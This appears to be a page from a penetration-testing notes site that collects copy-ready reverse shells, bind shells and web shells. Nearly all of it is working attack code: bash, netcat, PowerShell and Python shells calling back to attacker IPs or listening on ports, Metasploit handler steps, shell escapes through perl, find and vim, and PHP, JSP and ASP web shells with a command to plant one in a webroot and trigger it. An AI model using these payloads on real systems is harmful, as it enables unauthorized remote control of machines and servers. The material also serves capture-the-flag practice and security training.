Setting up Shells

This is a collection of few useful scripts for creating reverse, bind and web shells.

Reverse Shells:

Preparing the shell script:

Linux target:

$ bash -c 'bash -i >& /dev/tcp/1.1.1.1/PORT 0>&1'
# OR 
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENEING PORT> >/tmp/f

# To be saved in a .php file.
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 <LISTENEING PORT> >/tmp/f"); ?>

Other resources online will be helpful in other cases if we need another programming language to execute the script/code not only bash or PHP or even if the payloads above don't work.

Reverse Shell Cheat Sheet - Internal All The Things

Online - Reverse Shell Generator

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetpentestmonkey.net

Windows Target:

target-host> powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('1.1.1.1',PORT);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Setting up a listener on our attacking machine:

Using netcat

attacking-machine$ nc -lvnp 1234
   -l Listen mode.
   -v Verbose mode.
   -n Disable DNS resolution and only connect from/to IPs, to speed up the connection.
   -p 1234 Port number netcat is listening on.

Using metasploit

msf6 > use multi/handler
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 1337
msf6 exploit(multi/handler) > run

Results of the injection:

attacker@attacking-machine$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [1.1.1.1] from (UNKNOWN) [10.10.10.10] 41572

victim@target-host> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We successfully got a connection back now it's time to make it more stable and efficient.

Interactive Shells

In order to upgrade our shell to a fully TTY let's follow these steps:

Full TTY

victim@target$ python3 -c 'import pty; pty.spawn("/bin/bash")'
victim@target-host$ ^Z
attacker@attacking-machine$ stty raw -echo && fg
[Enter]
[Enter]
victim@target-host$
# Terminal size :
victim@target-host$ export TERM=xterm-256color
victim@target-host$ stty rows 67 columns 318


Raw mode: This means that characters are delivered to the application as soon as 
they are typed, without any line buffering or special interpretation (such as Ctrl+C for interrupt).
-echo: By turning off echoing, characters typed by the user won't be displayed on the screen.

Now we can use the full terminal features.

Intuitively, since we're executing commands on a target machine, all of our work highly and directly depends on the permissions of the files/binaries we're aiming to execute. So?

sudo -l your way in in easy boxes 😄

Bash

victim@target$/bin/sh -i
sh: no job control in this shell
sh-4.2$

Perl

victim@target$perl —e 'exec "/bin/sh";'

#To be run inside of a perl script
victim@target$perl: exec "/bin/sh";

Ruby

victim@target$ruby: exec "/bin/sh"

Lua

victim@target$lua: os.execute('/bin/sh')

Find

victim@target$find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
#Example:
find . -exec /bin/sh \; -quit

Vim

victim@target$vim -c ':!/bin/sh'

victim@target$vim
:set shell=/bin/sh
:shell

Bind shells:

Listener on the target machine:

Linux Target:

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

Windows target:

atrget-host> powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

Connecting to the target:

$ nc 10.10.10.10 1234
# Successful connection a shell is now open:
victim@target-host> id # Our command, since this is a windows target we should inject a cmdlet
uid=33(www-data) gid=33(www-data) groups=33(www-data) # server response

We successfully got a remote shell on the target machine. If it isn't an unstable and "featureless" terminal, we can upgrade to a full TTY as in the Reverse shells paragraph.

Web Shells

For more Web Shell techniques and scripts, have a look at this.

Preparing the file

<?php system($_REQUEST["cmd"]); ?>

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

<% eval request("cmd") %>

Injecting to the webroot

Web Server

Default Webroot

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot\

XAMPP

C:\xampp\htdocs\

We can check these directories to see which webroot is in use and then use echo to write out our web shell. For example, if we are attacking a Linux host running Apache, we can write a PHP shell with the following command:

$ echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

Execution

Visit the shell.php page on the compromised website, and use ?cmd=id to execute the id command: http://SERVER_IP:PORT/shell.php?cmd=idWe'll get the result of the id command on the web page!
Or Use curl command:$ curl http://SERVER_IP:PORT/shell.php?cmd=id

PreviousShells & SSH NextKnowledge Check

Last updated 6 months ago